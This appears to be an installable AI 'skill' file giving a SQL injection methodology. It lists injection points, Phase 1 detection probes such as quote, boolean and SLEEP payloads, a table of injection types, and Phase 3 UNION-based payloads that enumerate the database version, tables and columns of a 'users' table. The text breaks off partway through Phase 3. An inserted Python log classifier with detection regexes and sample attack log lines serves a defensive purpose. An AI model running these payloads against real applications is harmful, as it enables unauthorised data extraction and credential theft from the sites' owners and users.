Install: claude install-skill sunilgentyala/OmniRed
# SQL Injection
## Attack Surface
Any user-controlled value that reaches a SQL query without parameterisation: form fields, URL parameters, HTTP headers (User-Agent, Referer, X-Forwarded-For, Cookie), JSON/XML body fields, search boxes, sort/order parameters, GraphQL variables.
## Methodology
### Phase 1 — Detection
Test all injection points with:
```sql
' -- error-based detection
'' -- escaped quote (normalised input)
` -- MySQL backtick
') -- close parenthesis
1' OR '1'='1
1 AND 1=1
1 AND 1=2 -- compare responses for boolean blind
1; SELECT SLEEP(5)-- -- time-based blind
```
Observe: HTTP status changes, response length diffs, error messages, timing differences.
### Phase 2 — Classification
| Injection type | Indicator |
|---|---|
| Error-based | DB error message in response |
| UNION-based | Response reflects query output |
| Boolean blind | Binary response difference (login/no login, 200/500) |
| Time-based blind | Response delay on `SLEEP()`/`WAITFOR DELAY` |
| Out-of-band | DNS/HTTP callback from DB server |
| Second-order | Stored, triggered on later retrieval |
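A defender-side counterpart to the two phases above, added here and not part of the original skill: a small classifier that runs the Phase 1 probe patterns over combined-format web server log lines (URL parameters plus the Referer and User-Agent headers named in the Attack Surface section) and maps each hit to a Phase 2 class. The log format, the regexes and the sample lines are my own assumptions and constructed data; the output is a triage signal for review, not a blocking rule.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Probe families from the Phase 1 list, mapped to Phase 2 classes. Order matters:
# the specific families (time-based, UNION) are tried before the generic quote probe.
SIGNATURES = [
    ("time-based blind", r"\b(?:sleep|pg_sleep|benchmark)\s*\(|\bwaitfor\s+delay\b"),
    ("union-based", r"\bunion\b[\s\S]{0,40}?\bselect\b|\border\s+by\s+\d+|\binformation_schema\."),
    ("boolean blind", r"\b(?:or|and)\b\s*'?\d+'?\s*=\s*'?\d+"),
    ("error-based", r"(?:'|`|'\))\s*(?:--|#)?\s*$"),  # bare quote / backtick / ') ending a value
]
SIGNATURES = [(label, re.compile(rx, re.I)) for label, rx in SIGNATURES]

# Assumed Apache/nginx "combined" format; Referer and User-Agent are captured because
# the Attack Surface section lists request headers as injection points.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+) [^"]*" '
                    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$')

def classify(value):
    """Return the Phase 2 class a (URL-decoded) value looks like, or None."""
    return next((label for label, rx in SIGNATURES if rx.search(value)), None)

def inspect_line(line):
    """Return (ip, status, [(where, class), ...]) for one log line, or None if unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # parse_qsl URL-decodes parameter values; header values are decoded explicitly.
    candidates = [(f"param:{k}", v) for k, v in parse_qsl(urlsplit(m["path"]).query, keep_blank_values=True)]
    candidates += [(f"header:{h}", unquote_plus(m[h])) for h in ("ref", "ua")]
    findings = [(where, classify(v)) for where, v in candidates if classify(v)]
    return m["ip"], int(m["status"]), findings

def summarize(lines):
    """Map each source IP to the set of injection classes seen from it."""
    seen = {}
    for line in lines:
        parsed = inspect_line(line)
        if parsed and parsed[2]:
            seen.setdefault(parsed[0], set()).update(label for _, label in parsed[2])
    return seen

# Constructed sample lines (not real traffic): one benign request, then Phase 1 probes
# in a URL parameter and, on the last line, in the User-Agent header.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /search?q=shoes HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Oct/2023:13:55:40 +0000] "GET /item?id=1\' HTTP/1.1" 500 312 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Oct/2023:13:55:41 +0000] "GET /item?id=1%20AND%201%3D2 HTTP/1.1" 200 87 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Oct/2023:13:55:44 +0000] "GET /item?id=1%20UNION%20SELECT%20NULL,NULL,NULL-- HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [10/Oct/2023:13:56:02 +0000] "GET /item?id=2 HTTP/1.1" 200 5100 "-" "Mozilla/5.0\' AND SLEEP(5)-- "',
]
```

`summarize(SAMPLE_LOG)` groups the classes per source address; pairing boolean-blind hits from one address against the status and size differences the Phase 1 notes tell you to compare is the natural next step, and the `500` on the quote probe is the error-based indicator from the table.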
### Phase 3 — Exploitation
**UNION-based (enumerate columns first):**
```sql
1 ORDER BY 1-- -- increment until error to find column count
1 UNION SELECT NULL,NULL,NULL--
1 UNION SELECT 1,version(),database()--
1 UNION SELECT 1,table_name,3 FROM information_schema.tables--
1 UNION SELECT 1,column_name,3 FROM information_schema.columns WHERE table_name='users'--